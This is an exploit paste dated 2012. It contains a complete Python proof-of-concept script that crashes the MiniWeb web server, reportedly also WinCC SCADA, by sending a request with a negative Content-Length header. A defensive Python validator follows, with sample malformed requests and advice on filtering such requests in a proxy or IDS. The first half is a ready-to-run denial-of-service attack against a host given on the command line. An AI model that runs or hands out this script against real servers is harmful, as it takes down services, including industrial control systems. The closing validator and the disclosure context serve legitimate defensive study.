MiniWeb Content-Length DoS PoC Exploit
infodox May 31st, 2012
#!/usr/bin/env python
# miniweb Content-Length DoS PoC
# Not a 0day, sadly.
# aluigi found this ages back, I independently rediscovered it fuzzing
# and noticed it was still unpatched. Oh well, better disclose so!
# vuln version at code.google.com/p/miniweb/
# affects WinCC also :) (Oh, them SCADA...)
# Massive props to ohdae for helping with this!
# insecurety.net | bindshell.it.cx
import sys
import socket

def banner():
    print """
MiniWeb Killer - Kills MiniWeb
-Insecurety Research
-Bindshell Labs
"""

banner()
if len(sys.argv) != 3:
    print "Usage: ./MiniDoS.py <host> <port>"
    sys.exit(1)

target = sys.argv[1]
port = sys.argv[2]

# request with a negative Content-Length value
evil = "POST / HTTP/1.1\r\n"
evil += "Host: %s\r\n" %(target)
evil += "User-Agent: MiniWeb Killer ^-^\r\n"
evil += "Content-Length: -10 \r\n\r\n" # part that kills the box

expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
try:
    expl.connect((target, int(port)))
    print "[+] Connected, firing das payload!"
except socket.error:
    print "[-] Connection Failed... Is there even a target?"
    sys.exit(1)
try:
    expl.send(evil)
    print "[+] Payload Sent!"
except socket.error:
    print "[-] Payload Sending Failure... WTF?"
    sys.exit(1)
expl.close()
print "[*] Should be dead..."
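
On the defensive side, the `Content-Length: -10` header in the paste above is rejected by any parser that accepts only an unsigned decimal value. The Python 3 check below is an added example, not part of the original paste or of MiniWeb; the function names, the `MAX_BODY` limit and the sample requests are assumptions constructed for illustration.

```python
import re

MAX_BODY = 10 * 1024 * 1024          # assumed policy limit, not from the paste
DIGITS = re.compile(rb"\A[0-9]+\Z")  # Content-Length grammar: 1*DIGIT

def content_length_verdict(raw: bytes):
    """Return (ok, reason) for the header block of a raw HTTP request."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    values = []
    for line in head.split(b"\r\n")[1:]:          # skip the request line
        name, sep, value = line.partition(b":")
        if sep and name.strip().lower() == b"content-length":
            values.append(value.strip(b" \t"))    # surrounding whitespace is legal
    if not values:
        return True, "no Content-Length"
    if len(set(values)) > 1:
        return False, "conflicting Content-Length headers"
    value = values[0]
    if not DIGITS.match(value):                   # rejects "-10", "+5", "0x10", ""
        return False, "Content-Length is not an unsigned decimal"
    if len(value) > 15 or int(value) > MAX_BODY:  # length guard before int()
        return False, "Content-Length exceeds limit"
    return True, "ok"

# Constructed sample requests; "paste_header" reuses the header from the paste.
HEAD = b"POST / HTTP/1.1\r\nHost: test.invalid\r\n"
SAMPLES = {
    "paste_header": HEAD + b"Content-Length: -10 \r\n\r\n",
    "normal": HEAD + b"Content-Length: 5\r\n\r\nhello",
    "plus_sign": HEAD + b"Content-Length: +5\r\n\r\nhello",
    "conflict": HEAD + b"Content-Length: 5\r\nContent-Length: 6\r\n\r\nhello",
    "huge": HEAD + b"Content-Length: 99999999999999999999\r\n\r\n",
    "no_body": b"GET / HTTP/1.1\r\nHost: test.invalid\r\n\r\n",
}

def classify_samples():
    """Map each sample name to True (accept) or False (reject)."""
    return {name: content_length_verdict(raw)[0] for name, raw in SAMPLES.items()}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(name, content_length_verdict(raw))
```

The same check can run in a reverse proxy or an IDS preprocessor in front of an unpatched embedded web server, so that the malformed request is dropped before it reaches the vulnerable parser.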